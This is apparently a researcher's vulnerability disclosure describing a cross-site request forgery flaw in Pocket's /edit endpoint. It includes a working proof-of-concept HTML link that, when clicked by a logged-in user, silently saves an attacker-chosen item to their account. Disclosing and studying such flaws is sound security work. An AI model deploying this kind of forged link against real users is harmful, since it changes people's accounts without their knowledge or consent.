GetPocket getpocket.com CSRF (Cross-Site Request Forgery) Web Security Vulnerability
Domain:
getpocket.com
“Pocket was founded in 2007 by Nate Weiner to help people save interesting articles, videos and more from the web for later enjoyment. Once saved to Pocket, the list of content is visible on any device — phone, tablet or computer. It can be viewed while waiting in line, on the couch, during commutes or travel — even offline. The world’s leading save-for-later service currently has more than 17 million registered users and is integrated into more than 1500 apps including Flipboard, Twitter and Zite. It is available for major devices and platforms including iPad, iPhone, Android, Mac, Kindle Fire, Kobo, Google Chrome, Safari, Firefox, Opera and Windows.” (From: https://getpocket.com/about)
Vulnerable URL:
https://getpocket.com/edit?url=http%3A%2F%2Fwpshout.com%2Fchange-wordpress-theme-external-php&title=
A website created by me is used for the following tests. The website is "http://itinfotech.tumblr.com/". Suppose that this website is malicious. If it contains the following link, attackers can save any item they like to the victim's Pocket.
<a href="https://getpocket.com/edit?url=http%3A%2F%2Fmake.wordpress.org%2Fcore%2F2014%2F01%2F15%2Fgit-mirrors-for-wordpress&title=csrf test">getpocket csrf test</a> [1]
When a logged-in victim clicks the link ([1]), a new item is saved to his/her Pocket without his/her knowledge, because the /edit endpoint performs a state change on a plain GET request that carries only the session cookie. The attack has succeeded.
Proof-of-concept video: GetPocket Online Website CSRF (Cross-Site Request Forgery) Web Security Vulnerability